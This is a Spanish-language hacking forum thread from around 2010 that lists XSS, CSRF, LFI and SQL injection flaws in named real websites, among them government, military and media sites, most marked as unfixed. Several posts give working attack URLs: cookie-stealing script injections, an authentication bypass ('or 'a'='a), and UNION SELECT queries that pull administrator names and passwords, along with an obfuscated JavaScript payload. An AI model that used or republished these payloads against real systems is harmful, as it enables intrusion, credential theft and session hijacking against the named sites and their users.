Recopilatorio de Vulnerabilidades de XSS/SQLinjection

Iniciado por sirdarckcat, 26 Mayo 2008, 03:50 AM

0 Miembros y 1 Visitante están viendo este tema.

jdc

Sitio web: http://www.ejercito.cl
Descubridor: janito24
URL del aviso: http://h4ckvi505.wordpress.com/2010/02/19/xss-www-ejercito-cl-ejercito-de-chile/
Fecha de descubrimiento: 19 de febrero 2010
Fecha de notificación: 19 de febrero 2010
Fecha de publicación: 19 de febrero 2010
Arreglado: No
Información adicional: XSS en el error de mysql que se muestra :x

http://www.ejercito.cl/nuestro_ejercito/discursos.php?id=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

jdc

Sitio web: http://www.megaupload.com
Descubridor: janito24
URL del aviso: http://h4ckvi505.wordpress.com/2010/02/19/csrf-www-megaupload-com/
Fecha de descubrimiento: 19 de febrero 2010
Fecha de notificación: 19 de febrero 2010
Fecha de publicación: 19 de febrero 2010
Arreglado: No
Información adicional: CSRF (Cambio de idioma arbitrario)

http://megaupload.com/?setlang=es a español
http://megaupload.com/?c=contact&setlang=de a aleman
http://www.megaupload.com/?d=9450P71D&setlang=fr a frances

NOTA: "TODAS" las urls de megaupload son vulnerables, por lo tanto desde cualquier parte pueden cambiar el idioma a quien quieran con tan solo mandarle el link

ElAntiguoTroll

#22
Sitio web: http://www.nngg.org
Descubridor: EgoPL
Fecha de descubrimiento: 22/08/09
Fecha de publicación: 16/05/10
URL del aviso: http://twitter.com/EgoPL/status/14108571687
Arreglado: No
Información Adicional:
El panel de admin esta en el subdominio intranet.

SH4V

#23

Sitio web: http://es.msn.com/
Descubridor: SH4V
URL del aviso: http://txt.io/sh4v
Fecha de descubrimiento: 18 de mayo de 2010
Fecha de notificación: 18 de mayo de 2010
Fecha de publicación: 18 de mayo de 2010
Arreglado: no
Vulnerabilidad: XSS

http://populus.es.msn.com/participa.aspx?nombre=";}if (1){alert(document.cookie);//

Citarjavascript:đ=+!!{};(this)[ł={ŋ:''+!'[]',ŧ:''+!!đ},ł.ŋ[đ]+ł.ŋ[đ+đ]+ł.ŋ[++đ+đ]+ł.ŧ[--đ]+ł.ŧ[+!đ]](đ)

Shell Root

Sitio web: www.dragonjar.org
Descubridor: csaralg
URL del aviso: http://comunidad.dragonjar.org/f179/test-xss-10064/
Fecha de notificación: Miércoles 8 de Junio
Fecha de publicación: Miércoles 8 de Junio
Arreglado: No
Vulnerabilidad: XSS
http://comunidad.dragonjar.org/f179/test-xss-10064/#post27048
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

Guide_Shen

Sitio web: http://www.fuckbook.com
Descubridor: sh3n
URL del aviso: http://guideshen.blogspot.com/2010/07/xss-in-fuckbook.html
Fecha de descubrimiento: 10/07/2010
Fecha de notificación: 11/07/2010
Fecha de publicación: 11/07/2010
Arreglado : No, UNFIXED
Información adicional:
http://www.fuckbook.com/member/profile_sh3n.html
Evolution of Revolution  -  http://xsstorm.blogspot.com

t3kyla

Sitio web: http://www.satt.gob.pe
Descubridor: T3kyla
URL del aviso: http://t3kyla.wordpress.com/2010/09/13/sql-injection-en-satt-gob-pe/
Fecha de descubrimiento: 12/09/2010
Fecha de notificación: 12/09/2010
Fecha de publicación: 12/09/2010
Arreglado : No
Información adicional:
http://www.satt.gob.pe/Servicios%20al%20Ciudadano/Servicio%20Atencion%20Virtual/SAV_Valida.asp?Persona_Activo=&Act=&txtUsuario=t3kyla%27%20or%20%27a%27=%27a&txtClave=123456

Ari Slash

#27
Sitio web: http://www.federacionchilenaderemo.cl
Descubridor: Ari-Slash
URL del aviso: h4ckvi505.wordpress.com/2010/09/20/federacion-chilena-del-remo/
Fecha de descubrimiento: 20 de septiembre 2010
Fecha de notificación: 20 de septiembre 2010
Fecha de publicación: 20 de septiembre 2010
Arreglado: No
Vulnerabilidad: SQLI en el buscador

nota: No doy mas info de codigo sql por posibles lamerias

saludos

Ari Slash

#28
Sitio web: www.almatec.com.ar
Descubridor: Ari-Slash
URL del aviso: h4ckvi505.wordpress.com/2010/09/25/vulnerabilidad-www-almatec-com-ar/
Fecha de descubrimiento: 20 Enero 2010
Fecha de notificación: 20 de Enero 2010
Fecha de publicación: 25 de septiembre 2010
Arreglado: Si, pero ahora da lugar a un SQLI
Vulnerabilidad: LFI, SQLI y BLIND SQLI
Informacion adicional: el arreglo consistio en dar un id unico a cada archivo que se subia, de la forma download.php?id=
pero esa solucion dio lugar a sqli, siempre tomando el 2 campo del select debido a que debian retornarse cierta cantidad de columnas.

LFI (reparado):
download.php?file=admin/includes/Class.DB.php

SQLI:
descargas2.php?id=4%20union%20select%20id,nombre,password,4%20from%20administrador%20where%20id=1;--
descargas2.php?id=4%20union%20select%20id,password,nombre,4%20from%20administrador%20where%20id=1;--


Guide_Shen

Sitio web:  http://comunidad.terra.com
Descubridor: sh3n
URL del aviso: http://www.xssed.com/mirror/69836/
Fecha de descubrimiento: 12 de Octubre del 2010
Fecha de notificación: 12 de Octubre del 2010
Fecha de publicación: 14 de Octubre del 2010
Arreglado : NO, UNFIXED
Información adicional:Cross-site scripting
poc: http://bit.ly/aWUdux


Saludos
Hace unos dias publique otro post pero creo q fue borrado o movido, dejo una copia


Sitio web:  http://search.discovery.com
Descubridor: sh3n
URL del aviso: http://xsstorm.blogspot.com/2010/10/discovery-channel-xshacked.html?spref=tw
Fecha de descubrimiento: 12 de Octubre del 2010
Fecha de notificación: 12 de Octubre del 2010
Fecha de publicación: 14 de Octubre del 2010
Arreglado : NO, UNFIXED
Información adicional:Cross-site scripting
poc: http://bit.ly/9MKuAi



P.D
Si por algun motivo eliminan este post agradeceria que me informaran
Evolution of Revolution  -  http://xsstorm.blogspot.com